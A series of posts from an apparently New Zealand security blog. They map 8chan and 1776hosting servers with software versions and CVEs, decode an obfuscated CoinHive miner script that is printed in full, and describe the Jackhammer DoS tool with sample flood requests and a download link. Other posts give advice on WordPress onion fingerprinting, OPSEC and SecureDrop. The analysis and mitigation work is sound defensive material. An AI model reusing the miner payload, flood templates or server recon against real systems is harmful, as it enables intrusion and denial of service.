Posted on

Fascist Hosting Company 1776hosting.com

AS397702 1776 Solutions, LLC

IP Addresses: 256

Netblock: 103.114.191.0/24

Hosted Domains
There are 9 domain names hosted across 13 IP addresses on this ASN.

103.114.191.1 RouterOS v6.45.3 http://103.114.191.1
103.114.191.30 1776hosting.com
103.114.191.34 https://mail.jaw.sh
103.114.191.36 https://103.114.191.36 Kiwi FOSS
103.114.191.37 kfcdn.xyz
103.114.191.40 https://riot.kiwifarms.net, matrix.kiwifarms.net
103.114.191.41 https://www.lolcow.tv
103.114.191.47 nginx [ssl:autodelete.kiwifarms.net]
103.114.191.55 9chan (Cloudflare), 9chan.hk
103.114.191.56 9chan (Cloudflare)
103.114.191.129 [503 Service Unavailable] democratieparticipative.website
103.114.191.132 [NS_ERROR_NET_ON_TRANSACTION_CLOSE] sonichu.com
103.114.191.139 https://mirror.bullshit.agency
103.114.191.144 https://103.114.191.144 [400 Bad Request]
103.114.191.145 CentOS [ssl:wiki.onaforums.net]
103.114.191.153 https://onaforums.net [Apache]
103.114.191.154 Apache2 Debian [action-zealandia.com]
103.114.191.156 nginx [ssl:brooklynfink.com]
103.114.191.168 Freech Enterprises LTD https://lsxsnow6jabasmfaioc6hmxlzqld45tbppc474rm2kswpslbybttylqd.onion
103.114.191.235 9chan (Cloudflare) [possibly principal live site]
103.114.191.245 9chan (Cloudflare) [possibly also ninechnjd5aaxfbcsszlbr4inp7qjsficep4hiffh4jbzovpt2ok3cad.onion]

Posted on

A Quick Look into 8 Chan – IP Map

8 Chan is hosted in Reno, USA at N.T Technology In. They employ a range of servers to host 8chan including a mail server, a mirroring server, and various mirror servers. 8 Chan are a service that masquerades as a free-speech platform but in reality is purpose built to recruit, train and mobilise ethno-nationalist and alt-right extremism.

8 Chan employs the services of CloudFlare who protect their terrorism spawning platform from DDoS Attacks.

For a look into their other websites, see: EXCLUSIVE: How money flows from Amazon to 8chan

What is more interesting than staring at CloudFlare servers are the actual 8 Chan web-servers themselves. Below is a little map of their current setup which will likely change in the coming days.

Warning: This may bore you to death

  • https://whois.arin.net/rest/org/NTTECH-1.html
    Jim Watkins and his son run this little private server farm.
  • https://whois.arin.net/rest/poc/TW488-ARIN.html
  • Netblock NET-206-223-144-0-1 (Hosts 8ch.net) Info
  • https://whois.arin.net/rest/net/NET-206-223-144-0-1.html
  • IP Block: 206.223.144.0 – 206.223.159.255

Production Servers

Server IP: 206.223.147.150

  • Server: nginx/1.11.3
  • Mail server
  • X-Powered-By: PHP/5.4.16
  • mail.8ch.net
  • SSH-2.0-OpenSSH_6.6.1
  • Ports: 22, 25, 80, 110, 143, 993, 995, 5353 is open – Multicast DNS

Observation: This is obviously a mail server application and very out of date.

Server IP: 206.223.147.210

  • Not properly bound to 8chan
  • Server: nginx/1.8.0
  • SSH-2.0-OpenSSH_6.6.1_hpn13v11 FreeBSD-20140420

Observation: It is likely this is the principle server

Server IP: 206.223.147.236

  • Bound to 8chan.net
  • Server: nginx/1.14.0
  • SSH-2.0-OpenSSH_7.2 FreeBSD-20160310

Server IP: 206.223.147.215

  • redirects to 8chan.net
  • Server: nginx/1.8.1
  • OpenSSH NULL

Server IP: 206.223.147.222

  • redirects to 8chan.net
  • Server: nginx/1.10.1
  • SSH-2.0-OpenSSH_7.2 FreeBSD-20160310

Live Static Archives:

  • They appear to be static live html outputs of the site
  • PHP script is disabled

206.223.147.214

  • Server: nginx/1.8.1
  • SSH-2.0-OpenSSH_7.2 FreeBSD-20160310

206.223.147.217

  • Server: nginx/1.14.0
  • SSH-2.0-OpenSSH_7.5 FreeBSD-20170903

206.223.147.218

  • CVE-2018-15919
  • CVE-2018-15473
  • CVE-2017-15906
  • Server: nginx/1.14.0
  • SSH-2.0-OpenSSH_7.5 FreeBSD-20170903

206.223.147.221

  • Server: nginx/1.11.2
  • SSH-2.0-OpenSSH_7.5 FreeBSD-20170903

======================================

Other servers of interest in this IP range (but not necessarily 8CH):

206.223.156.246

  • ESMTP Postfix (Ubuntu)
  • Server: nginx/1.4.6 (Ubuntu)

206.223.147.211

  • Server: nginx
  • Port 123 is open: NTP Multicast DNS…Mac?
  • Port 443
  • Port 5353 is open: Mac workstation?
  • Port 8080 is open: http://206.223.147.211:8080 = > See below
  • Port 9306 is open: database port, probably bound locally

Observation: This looks like a remote workstation

http://206.223.147.211:8080

  • Server: nginx
  • This server likely does the archiving / static page generation
  • https://gitgud.io/Sapphire/FutaBilly

206.223.147.213

  • SSH-2.0-OpenSSH_7.2 FreeBSD-20160310

206.223.147.219

  • Port 22 open
  • CVE-2016-8858
  • SSH-2.0-OpenSSH_7.2 FreeBSD-20160310

Observation: SSH servers?

206.223.147.220

  • CVE-2016-8858
  • SSH-2.0-OpenSSH_7.2 FreeBSD-20160310

Observation: SSH servers?

206.223.147.227

  • Meow
  • Server: Apache/2.4.7 (Ubuntu)
  • SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8
Posted on

Why you should ditch Cloudflare

Cloudflare is a network provider offering a reverse proxy, pass-through service. Apart from some terrible security practices, (for example even if you use SSL certificates [https://], Cloudflare can see your passwords), Cloudflare also does the following:

  • Shields criminal webmasters by hiding their IP address from the public.

The example most on our minds at the moment is the massacre of worshippers at several mosques in Christchurch, Aotearoa New Zealand by a white supremacist terrorist, who had used 8chan as a launch pad for his terror. Cloudflare, while fully aware of the activities that occur on 8chan, and even after this took place on their clients web platform, continue to offer them IP shielding, protecting the very existance of 8chan, allowing users free reign to plan, strategise and refine the tactics of their next mass shooting.

What can you do?

Check if your company or webserver uses Cloudflare and ditch them. They are not an essential service for 99% of their customers use their service more because of scareware tactics by the company.

How can I find out if my website is using Cloudflare?

Check to see if your domain name is in the following list of 10,078 websites that use Cloudflare:

If they are then if you are familiar with domain name DNS you can either log into your web service control panel and follow their instructions about how to disconnect the service, essentially resetting your domain name servers back to their original settings, or contact the help and support centre of your web service to request either instructions or their assistance to remove your support for this service.

Posted on

Analysis of an embedded javascript cryptocurrency miner malware

Unfortunately the combination of weak content management security combined with CoinHive have made it quite easy for attackers to embed cryptocurrency miners into webpages. Using obfuscated code, malware authors are able to insert javascript into pages that evade detection.

Browser users can use addons that blacklist access to coinhive javascript libraries and the many duplicates that are popping up, but much like antivirus, they merely block known versions.

Example Attack Code Remote Repository:

https://pastebin.com/raw/RNsgLpRs

Use: Embeded into webpages

<script type='text/javascript' src="https://pastebin.com/raw/RNsgLpRs"></script>

Payload:

(function (id){
      var s = "=tdsjqu!tsd>#iuuqt;00dpjoijwf/dpn0mjc0dpjoijwf/njo/kt#?=0tdsjqu?
                 =tdsjqu?!wbs!njofs!>!ofx!DpjoIjwf/Bopoznpvt)((-!|!uispuumf;!1/3!
                 ~*<njofs/tubsu)*<=0tdsjqu?";
var res = "";
var stringLength = s.length;
var flag = false;
for(var i = 0; i < stringLength; i++){
if(s.charCodeAt(i) == 40){
if(flag) continue;
res += "\'" + id;
flag = true;
}
res += String.fromCharCode(s.charCodeAt(i)-1);
}
document.write(res);
})
('i2y4BgTPHv3upoWyw0XCXZRn6RgWnKdw'); // I assume this is here for the attackers own reference...lol

1) var s = the main payload string

2) s.charCodeAt(i)-1 recodes s string to unicode string with values “shifted” by -1

60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,99,111,105,
110,104,105,118,101,46,99,111,109,47,108,105,98,47,99,111,105,110,104,105,118,101,46,109,
105,110,46,106,115,34,62,60,47,115,99,114,105,112,116,62,60,115,99,114,105,112,116,62,32,
118,97,114,32,109,105,110,101,114,32,61,32,110,101,119,32,67,111,105,110,72,105,118,101,
46,65,110,111,110,121,109,111,117,115,40,39,39,44,32,123,32,116,104,114,111,116,116,108,
101,58,32,48,46,50,32,125,41,59,109,105,110,101,114,46,115,116,97,114,116,40,41,59,60,47,
115,99,114,105,112,116,62

3) fromCharCode() method converts unicode values into characters

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script> var miner = new CoinHive.Anonymous('i2y4BgTPHv3upoWyw0XCXZRn6RgWnKdw',
{ throttle: 0.2 });miner.start();</script>

For browser prevention

For Firefox: Nominer
For Chrome: No Coin

For Website Injection Prevention

To prevent any rogue code being injected into your website files, or unauthorised files being added to your Content Management System (CMS) files repository, keep your CMS website, themes and plugins up to date, choose themes and plugins carefully, use secure webhosting.

Some security addons like Pareto Security can capture attempts to append code into WordPress, but none of these are as effective as following the above advice.

Posted on

Defeating fingerprinting scanning of onion websites running WordPress:

This is not a discussion about detecting if a TorHS website has WordPress installed, but rather about tricking attackers that scan your website into moving along, nothing interesting here.

For starters, if you are running multiple onion websites on a single webserver (and my recommendation is that you do not do this, use one website per webserver), you will need to make sure that your server is not vulnerable to an attack where it is possible for an attacker to enumerate all the onion sites running on your server.

So don’t be lazy, set your Virtualhost containers ServerName correctly!

That said (and is the point of this little blog piece), even if you have correctly configure this, WordPress has recently added a function that adds an extra ‘dns-prefetch’ into the page code which is in of itself, not interesting other than it could cause your onion site to be short-listed for further attention by attackers scanning for virtualhost mis-configurations because this new addition to WordPress can trigger a false positive.

For example if an attacker were to trace:

$ curl -H "Host: abcdefghijklm.onion" --socks5-hostname 127.0.0.1:9050 -s --user-agent "Mozilla/5.0" abcdefghijklm.onion | sha1sum

(note: even though sha1sum is vulnerable to collision attacks, we use it here merely for illustration purposes – i.e its a short hash)

This returns:
5f18492f012c9e1d0df76c47d4a7b75c703ae6c3 -

Same trace instead using localhost as the hostname:
$ curl -H "Host: localhost" --socks5-hostname 127.0.0.1:9050 -s --user-agent "Mozilla/5.0" abcdefghijklm.onion | sha1sum

Returns:
4d0389cf2c7e362fa5b3d920c8c6c394f5d0d021 -

This is because WordPress adds an extra:

< link rel='dns-prefetch' href='//abcdefghijklm.onion /' >

…when the trace hostname is localhost.

To prevent this, go to:
wp-content/themes/[current-theme]_child/functions.php

add:
remove_action('wp_head', 'wp_resource_hints', 2);

Now trace:

$ curl -H "Host: localhost" --socks5-hostname 127.0.0.1:9050 -s --user-agent "Mozilla/5.0" abcdefghijklm.onion | sha1sum
5f18492f012c9e1d0df76c47d4a7b75c703ae6c3 -

And:

$ curl -H "Host: abcdefghijklm.onion" --socks5-hostname 127.0.0.1:9050 -s --user-agent "Mozilla/5.0" abcdefghijklm.onion | sha1sum
5f18492f012c9e1d0df76c47d4a7b75c703ae6c3 -

Hashes match! Your site is not interesting, attacker moves along…

Mauriora!

Posted on

Hokioi Security OPSEC practices

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Hardware Security:

  • Hard drives are encrypted with unique pass phrases
  • Servers protected by pfSense hardware firewalls

Operating Systems:

  • Client OS: TAILS
  • TAILS USBs are destroyed regularly with a grinder and ‘soaked’

Communications Security:

Information Security:

  • Pass phrases are spread out over multiple e2e encrypted remotely stored password DB’s
  • No sensitive information is stored on any inhouse devices
  • Personal data is stored on an airgapped offline computer
  • Hokioi Security Canary Statement

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAEBCAAGBQJX+LBOAAoJEL7YCbL0gxCT5l0QAItbMw3iF11MWSms4VfsNm4k
UMuEtmIrNpxcx17czB3hYL0GEhM56L+BBUnZVkeowGbLqRdSqokkb3Hf/I7KhajZ
FVGLbgClriAjHeJfvNeCpsvJdRhHU+QIz3Mia0GtTOuVgUZnlcUylQSZKQICY4Th
yy2FfSVMnnxRt2a4WYxFM5RtEYj4+YnIerR6VNgwKAyouaaM7avW5+LeYIVda/Jb
QfRar/3050uIYxZMRBDkSBaCVvRLpEMQBFIkOU9LRr/ghvRkK+4YuwUXCn+Sk1wS
wsw2qCCjz36dgMBGN+co6q7UxhqfLqyrvcj81mPgV8rzZ70DVGiieKUO1s7ma/UU
2EFGxktJyG8ww/OtZHgYUzP6y2oxQL7XVqcBxbuMxjw55R9E2F8XpSxdlmPnYAEu
DwPDjQvYCXv4edINrGu/M6fuunLsTh33EBCg6qkC+YSXWxlLChViJhpGwiJbHX2k
QBZ1kE9De5XUGBa8H2gSsQUnDJL9N8PIFBChGLaikgGl7ZGkm9r/doK1pmSDS+Uv
sLJVQOL85Hu+DsaXbyXlJ5FJB5fNYXXw/L6etncrNPXGj6t6sTN2bn6mfXOU7u00
sUFE9lH5eANvwbrMZXEaHHQSwl4Pg1NERKsFj4aaeNPfurRFoY9qWggfdEPZNtsE
LIQ6pGoWl1ZezjT+Uixb
=mVpt
-----END PGP SIGNATURE-----

Posted on

Mitigating Jackhammer 1.2 website traumatising tool styled attacks

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

What is Jackhammer 1.2?

Jackhammer 1.2 ( sometimes called Jackhammer 2.0 ) was developed in 2003 by Mike Parniak ( Archon ) from TheBlackHand / Cafe Counterintelligence in response to CCISecurity script he released that blocked attacks from Jackhammer 1.0

Jackhammer is a MS Windows only, layer 7 attack application that also allows attackers to use multiple anonymous proxies to distribute the perceived point of origin of an attack across as many proxies as an attacker desires or is able to use, therefore masking the originating IP address of the attacker.

Attackers are able to choose from a number of attack strategies allowing them to tweak the exact type of attack that Jackhammer performs as well as optimising the overall data transfer, i.e 10,000 proxies x 0.1 ms = 1 request per 1000 seconds per proxy.

While Jackhammer is an old application, it’s attack method is still very relevant today as it was in 2003. With the advent of flood protection services such as Cloudflare, Jackhammer attacks are easily thwarted, but without employing such services, webservers are still quite vulnerable to the attacks that can be delivered via Jackhammer.

Jackhammer 1.2 Connection Strategies:

* Disconnect after Response Code: On this setting, Jackhammer only reads the first 12 bytes of the webserver’s response, in order to get it’s HTTP response code. This is mostly used in conjunction with the “Disable proxies on Bad Response Code” option. It lets Jackhammer detect if a proxy has been banned (403 code) or similar, and thus disable now-useless proxies during a flood.
* Disconnect on any data received: As soon as data is received from the proxy server, indicating a response to Jackhammer’s request, Jackhammer destroys the socket to avoid further data (minimizing received data, but ensuring that the proxy is responding).
* Hold connection until disconnected: This setting has Jackhammer sit on the socket and not disconnect it. Only if Jackhammer needs to create a new socket and is maxed out, or if the remote host disconnects it, will Jackhammer destroy a socket. This setting is often best used in conjunction with a slow speed to run a webserver out of connections.
* Disconnect after data sent: A low-bandwidth lifesaver. This option causes Jackhammer to disconnect immediately after successfully sending all the header data to the proxy. Tests have shown that the proxy will still deliver the request to the target server before disconnecting. This means it is a good option to use against scripts, but a poor option against large files.
* Incremental List Segments: If an attacker has a large list of proxies, and are worried that the website they are flooding may ban the proxies they use as they’re flooding… attackers can have it only use pieces of the proxy list at a time.
* Get and use initial cookies: One of the other powerful options on Jackhammer is the ability to get and store the cookies that websites return, and pass them along on future connections. If an attacker enables this option then the first time each proxy performs a request, Jackhammer waits for the full response header and records all the cookies. From this point on, it adds a cookie: line with those cookies to all requests from that proxy.
* Get, use, and keep cookies updated: This option only works if the attacker also has the above option enabled. Instead of just waiting for the first set of cookies, Jackhammer will always read the full header and update the cookies accordingly.

An attacker can use these combinations of attacks to simulate expected traffic but at such a scale as to cause a denial of service condition, and in some cases, with little bandwidth consumption.

Example Low Bandwidth GET Request Attack:
For example where a CMS creates and database stores guest cookie sessions in this manner:

$guesthash = sha1( $_SERVER[ 'HTTP_USER_AGENT' ] . $ip );

Attack Method: Disconnect after data sent

GET http://attackvictim.com/?%%ALPHANUM[4,10]%%=%%ALPHANUM[4,10]%% HTTP/1.1
Accept: */*
Host: %%HOST%%
User-Agent: Mozilla/4.0 %%ALPHANUM[4,10]%%
X-Forwarded-For: %%IP%%

Then the above attack request method would quickly fill a database with junk guest sessions and in many cases overwhelming the database with very little data sent due to the ability to customise the user-agent with every request.

Add to that the ridiculously shitty way for example in which vBulletin determines the real IP address of a visitor in its fetch_alt_ip() function ( includes/class_core.php ), it is even possible to spoof the IP address with every request as well.

Resource Intensive Request Attacks:

Because Jackhammer allows for custom HTTP header requests, an attacker will often look for the most CPU/memory intensive, and/or bandwidth intensive request as their choice of attack.

POST Requests: these are cpu intensive and the favourite of attackers. Unprotected forms are the usual target and a flood attack of even a few requests per second can overwhelm a webserver.

Especially forms that result in an email, or emails being sent, can also result in both a servers resources being overwhelmed as well as a bandwidth attack as mass amounts of emails are generated from each POST request.

However there are other POST requests that can overwhelm a server even without a waiting form.

For example versions of PHP earlier than 5.4 were very susceptible to blind post request attacks where the post data generates a large multidimensional array:

i[]=1&i[]=2&i[]=3&i[]=4....i[]=1000

 

GET Requests: often targeted at site features like search functions where a search request results in a database intensive request which repeated in quick succession can quickly overwhelm a database server resources.

Example GET request of a search function using wild cards:

GET http://attackvictim.com/?search=a*&%%ALPHANUM[4,10]%%=%%ALPHANUM[4,10]%% HTTP/1.1
Accept: */*
Host: %%HOST%%
User-Agent: Mozilla/5.0
Client-IP: %%IP%%

GET request attacks targeting large files can also result in a bandwidth attack sufficient enough to cause a denial of service request condition.

Mitigation:

How to mitigate Jackhammer type attacks ( in this example using PHP and optionally javascript ) without ceding to the likes of Cloudflare, or other captcha services/methods:

One approach to mitigate an attack from tools like Jackhammer is to enumerate the ways in which these tools fail to emulate a standard browser as a means of detecting them as the source of an HTTP request.

Most layer 7 HTTP request attack tools cannot interpret javascript so therefore it is possible then for a server to ask a complex javascript initiated question that a standard browser with javascript enabled would be able to answer.

For example you could write a piece of javascript to set a session which a standard web browser would have no trouble completing but an attack tool like Jackhammer could not.

Javascript though for some web admins is not preferable.

The usual method is to set a session based IP management to count requests per a period of time and restrict IP addresses that break these rules.

A Jackhammer attack is often mistaken as a botnet attack because Jackhammer allows an attacker to deploy multiple proxies.

An attacker with a very large proxy list can deliver a sizeable attack even against rate-limiting algorithms because of the time it would take for Jackhammer to toggle through a very large list.

The time between the first and second request from a specific proxy IP address of an attacker employing say 10,000 anonymous proxies could be 5 minutes.

Combined with javascript as noted above, will very likely prevent an attack from proceeding.

Lastly it is important to prevent direct access to large files on a server, and it is preferred to pipe a file via session based access which are subject to the same browser emulation requirements stated above.

Download Jackhammer 1.2 for testing purposes only: https://mega.nz/#!fII2BKpZ
Decryption key: !CEFrXPHEbzFD2XdxIbpRRdhJjCHd1AifiCc256LwB3I
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAEBCAAGBQJX+K8+AAoJEL7YCbL0gxCTWL8P/3p3ElE9GWK+V2qQ5g0tr6Hf
aDqckNs2mKDcDJuBMnyfH//xeDSQJSAPmlwmV/1NINrvNSJsxb9kuIm8Z44arThB
wduEilbzeQZkbeVIoXT5n/XiT9PbVo5hsdaMmjCYtOtDQZ2xXcwiYUXVdhdjSxOa
GQdt9d9s/BwJem8T4QXAY594PxGMynGi2zpFWqEkxsaM5c9RN3loFpNpsQkoPHha
uAEIYfN7zoAafPzRZ6qdI1oXoaJWFpyQbEZjXBRvWyonJMzuWCs3zWA+3sQXNz9o
XbJTqmYmq2wqmdZK1ruGEJaourUatMTz1zOx+bkxzvLITeVJ/0xftLcIX5H2YDx9
poavS7cS7neFXTBrc1X0aisK5chA/glz9zQZ4qsHJmQirfCOJqN0UgilKNi34Ntu
Nts6e90JglKN40+6qqcp0/vDXkBsc3KqG1Rl42Fw9XOpciBJHmbNKg/dRvR+01dp
YqO+l6TEH2IVHBZfAjvxagjOSZhbP5ctu6kj2R1BYvLmdo4NHGyQwFKWjj9D8rOX
RGCkkoBOctpRx2FblyrPvqeG2MEzvbHJZ+mMnbl4aKAhzRuVDyXxbv8p8lP0UzSz
PepGmLXW5kV02uo6Jzw73kYr7IPo3AErr3kpcsmhcFHJPqU9NZqCqqoXfkE+h48g
2T+GwXOKAu98Z8u+AZ1T
=0wyT
-----END PGP SIGNATURE-----

Posted on

Further security considerations when hosting a SecureDrop or Globaleaks server

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

If you are a journalist organisation with a central office situated in a country that respects the role of journalists, then you may quite comfortably run a SecureDrop or Globaleaks server within the offices of your organisation and depend on journalistic privilege preventing governments from entering your offices and walking out with your secure dead drop servers, or forcing you to hand over ( in the case of SecureDrop where encrypting with a journalists GPG key is left up to the source ) the applications GPG key, or placing gag orders on you.

Be careful though, many states will selectively respect the rights of journalists depending on the size and power of the news network. For example even in Aotearoa New Zealand, the police have little qualms raiding the houses of independent journalists such was the case with investigative journalist Nicky Hager in 2014.

If your threat model means that keeping the location of your dead drop secret is also critical, then you should consider taking additional steps to protect your tor hidden service IP and therefore location from being discovered.

Hosting a secure dead drop:
Never run your SecureDrop or Globaleaks server on a VPS or any other form of remote hosting. There have been too many instances of virtual server vulnerabilities as well as malicious VPS providers. The most secure option is dedicated hardware in a secure premises.

Also avoid single point of failure services like load balancing methods which attempt to cloud host SecureDrop or Globaleaks servers. That also goes for applications that remote host the private keys. Avoid these.

Prevent guard node attacks:
There are a few types of attacks that target the relays which your SecureDrop or Globaleaks servers connects to. Their purpose is to deanonymise your server, and can also be used to attempt to identify who is connecting to your service.

To mitigate this attack you will have to consider running your own anonymous relays as dedicated entry nodes for your SecureDrop or Globaleaks server.

When these are safely configured, your SecureDrop or Globaleaks servers can then be set to now select its entry guard node only from those stipulated in the torrc file, and if these relays come under attack, your dead drop will just become unavailable rather than shift to relays that could potentially be under the control of an attacker.

Do not draw attention to your Tor Hidden Service:
Make sure the IP address of a Tor Hidden Service does not act in a way dissimilar to a standard user of Tor, the attacker will not be able to easily determine that there is a Tor Hidden Service running ( i.e do not run any other service on the IP of your Tor Hidden Service as these may draw attention to your specific IP address ).

It is also good practice however to run your SecureDrop or Globaleaks server on a separate internet connection than your organisations own corporate network connection.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAEBCAAGBQJX+K43AAoJEL7YCbL0gxCT6EgP/jbMphGL1ExxNFRlx8ZZvBzm
XK290/zrbMAlgK2oI5yPlXyhra1k4rKiDfLlBmU2hSkoaXUXjLGEV9nONkwJUh+m
ElIvu6kHS4OlL2yk2pilee7aUa0kYHw4QBRPgsMXmOnQ3jdddYbSnAN0ipu7Icys
gAwYJ7QDVvbjqiI5y1OTvex2QHZLM6ngvkXjDhUwDXCESzMeffLtSMKkX/oCcOma
1XcChkEOxA4lvHDlux3WZN43zlCOUFoKbeIf03QXlfq23urcjj3Nc8bykCWU1aD2
iBAi8NGKhapmpUE90A5A4Rb3AAtkLxCm3E2C+0EZvm0D69NY2ATDT/fP+z7weywy
nPNLB1EWrM+g98OauN72lSK5HvPjFRaVSJNIyXcgkApor+uxMmb6zc83Jmy9UCSx
nPr2b9dPjcxVMWV7lD6Y2hEe5rhIYgkh3SU0+eUQUsIaVlcuT8PA4/kdzzAJNwY7
0WuJ3BfIyU5GpyIyIN51iaj7S+CIlFkMvhIIVQEMn4BMDBgwqt0gTIsVMsD2AeGs
R+AlNk94jUEnMVUrCx/Ifn5xQ2dGHNVcu/eDZ1PYJLmYP0hn9BiF0Lc4t7XQ8Uib
LXWNZfr0xs+b8I/v6hoC8ZZRFrHaTCRB2nOyUcAWHvwEbXHjZi8QK4+y9OmTBYBH
klvq+A3G5ex/FbGDlafk
=k0ZQ
-----END PGP SIGNATURE-----

Posted on

Choosing the right secure submission system for your organisation

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

To begin, first read @yawnbox’s excellent piece on this.

Choosing which secure source submission platform is right for you. I want to add some additional thoughts on the differences ( while hopefully not regurgitating too much of what has already been covered by @yawnbox )

SecureDrop

SecureDrop in my opinion is designed and best suited with medium to large sized news media organisations in mind. If you are an established news media organisation and are seeking the most secure anonymous platform to manage newsroom sources, then you should look at deploying a SecureDrop platform.

SecureDrop requires the greater investment in equipment to meet its minimum requirements, and experienced Linux administrators to maintain and operate.

With SecureDrop, the administrator must be in-house.

SecureDrop does not require the source to have a javascript enabled TorBrowser in order to interact with the server and upload documents.

SecureDrop does offer the source the option to manually pre-encrypt files with the journalists PGP keys before uploading, without this though, a file is still encrypted with the applications own dedicated PGP key. This means person/persons with the pass phrase of the application’s PGP key can decrypt uploaded files.

SecureDrop’s technical strength is it’s NSA level hardened threat model reducing the threat surface to the bare minimum. The security practices stipulated in the SecureDrop Wiki documentation should be used by all journalists when handling secure information.

However at a certain level it also depends on a country’s ruling government to respect the right of journalists. For example a government who does not respect these rights could force the administrators to hand over the application’s PGP keys thus being able to decrypt any files still resident on the SecureDrop or future submissions if the organisation is forced to continue running the SecureDrop under duress.

Globaleaks

Globaleaks was designed to scale from a single journalist/receiver through to as many journalists/receivers as your server can handle, using the least amount of equipment -> a single webserver ( and an optional additional hardware firewall – my professional recommendation ).

Globaleaks requires the source to have a javascript enabled TorBrowser.

A Globaleaks administrator does not have to be in-house in order to configure administrative settings.

A Globaleaks source files are first temporarily pre-encrypted with a symmetric AES key before being encrypted with the journalists own PGP key ( recommended deployment method ). Therefore at no time are the files stored on the server in unencrypted form. This also means only *that* specified journalist can decrypt files sent to them.

An encrypted email notification can be configured to be sent to the corresponding journalist/receiver when a submission is made.

Globaleaks server can be more securely deployed in a country/region that has no respect for journalist privilege, or used for non-journalist related deployments using standard compartmentalisation methods. If the server location is compromised, a state actor cannot get access to encrypted files. Getting access to source content files is only possible if they de-anonymise the journalists/receivers, AND get access to their PGP private key pass phrase, in which case only the files of the individual journalists/receivers that are still resident on the server will be compromised, rather than all files.

Common to Both

Both platforms deploy on the Tor network to provide a layer of anonymity and end to end encryption as well as some protection of the location of the secure dead drop systems.

Both allow for multiple receivers/journalists.

Like any webserver system, they need an administrator to keep the physical equipment’s OS and applications up to date.

Both Globaleaks and SecureDrop can be deployed into an already compromised network, as is the case with many established news organisations, this is due to the use of the SecureDrop recommended pFSense hardware firewall being used with either choice.

Drawbacks

Many journalists still struggle with basic encryption issues. Using TAILS correctly and with persistence configured correctly, takes time to learn, and get used to if you do not use it regularly. PGP crypto is difficult to get right and clunky to use.

SecureDrop

So as is the case with some deployments of SecureDrop, often the administrators or an onsite security specialist is employed to take on the role of “file decrypter” rather than the journalists doing this function. Once decrypted, files are analysed then encrypted by this person with the PGP keys of the nominated journalist before forwarding to them.

Globaleaks

Globaleaks documented security requirements for journalists/receivers is low. Therefore I encourage journalists/receivers to use the same standards required by SecureDrop journalists/receivers. In security best practices they would only ever access the Globaleaks journalists/receivers login area via a dedicated TAILS laptop and decrypt files via a dedicated airgapped ( never used on the internet or networked ) TAILS laptop.

Globaleaks also demands sources enable javascript in their TorBrowser’s. This can be off-putting for the more security minded sources. Also some browsers like Orfox do not have the ability to enable javascript so are therefore blocked from interacting with a Globaleaks server.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAEBCAAGBQJX+K10AAoJEL7YCbL0gxCTtLoQAMWlWO7ZFhjwxIBxryvXS+A9
0W9EkOReT8kyT+3FP566so/3E9fGM/jZDH78XQH6sYaGeJzONGnTVKMxcJtu4y3D
efZK2Jna4Fau9MorHQPmWxT11SrC9pSoeUlakhD3r71A54j+NtTU8F/2U/6ZQDKd
4qvhK3RHS/rfMn5wtWfhgdLD5THiEoGe5Qqu7uJh70J4Dc4UAjqVtbZGDf4ZylAD
ufRztLZ7YKfBj34E0cuySn9jxUBq2Lp7qIqQbrhGS0c/Atp5NHwjJl8XOm/6ZBSC
ErvGwcies6/7MFAr9PPX0UCNgbIjKgzhPzc8LxpzAR0j7MhkVWFQLCHOunKQ/b0Y
hKdJtc6Yje0fPQgKD7yiOlrp3YFePC37qPtC+EUEniAPf/qBPcWi1tnKPA8xnyHI
rIZvntqd0UY7YfhZmsJxaNk1AWbI1feNrarO9vSHfWwL9EVv6HYXbX8j/ZHuophy
m2tq81w7UUQxpbCwx4aEaSPHK1qVTkFXouzDWZ7UPBmVtt1lBbg5LBW7h4mG8z/y
ck5aGrCUjlmyevgeLk97mMeU7jwBjsii6Ai+VE2R/ZwQBv5gnkFq0DVAv91YB0Sq
HasCh4Ty0TRfcyZVtW9ux6DWSxQ7V2p0zZE6GnZpIMT1ZGJGQxz0rLo3UVGhXcZO
8JY9c3UqwcEf6eDls0Jl
=bXa6
-----END PGP SIGNATURE-----

Posted on

My Analysis of the Rawshark Hack of Cameron Slater’s Communications

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

What I want to discuss here is the attack on the WhaleOil communications network which resulted in a large cache of emails and attachments becoming the centrepiece of Nicky Hager’s book Dirty Politics.

I hope that you the readers, bloggers and users of online services will learn from the mistakes Cameron Slater made, and harden your web applications to minimise the chances of this happening to you.

I will also try to keep this as non-techie and non-geeky as possible …

[ full story on Putatara.net ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAEBCAAGBQJX+Ku5AAoJEL7YCbL0gxCTIuEP/1CwfifqBNjua0rzu7fvcri/
ExdKCkxZeFR2KzaliMH6zxWEfwGzkXynU/CkHcOk6ly1K07qho5YHiTkYG8D6kJe
Kh82m6QwyLAJuui20zpVdBP0xIqTDNDm0V10rpndE9ZDguhfJyedD5SAsYqAmasv
K0LGo1ffudQqP8cmU6vjL2zsCAcRUplIb+3TXOCbZgO5g2ZBlB93eexr1utiKBRM
tMBsl/yeEI/4n9gI7ZSN1dR5FAYqbVOhebrPYm1VDF7qN0x2PuxI6r5Els0tAqI2
XMWGtTTWBbWhvoSYOoZKKbH/9syIAc78cQVLE99XmLGU0FEyydcqH48epvvaNYaT
MfTG86S6jKVkU1kfwUGU2ZEL6JKWMQPLJaV8T8RtKXrxe6DlEYTH8ULZKSk/8FI8
ADaO2nZyJdV5dCQqvCiO8Ky8OUvRVWX4Zl7K5moDyCfSklTBM3hS9rdrFrZ+sX+1
8lYnR8V2VZno5oD1wn6925158bPv+UVjnP89IdfLceKxQGbbo83nJtr7fhysCTGs
Hd0mWkw9ArMfrb0dkElrVdeMkPs/+HzoJBv5aiBLOjcbjUPG98dvXxkbWHhVy1B/
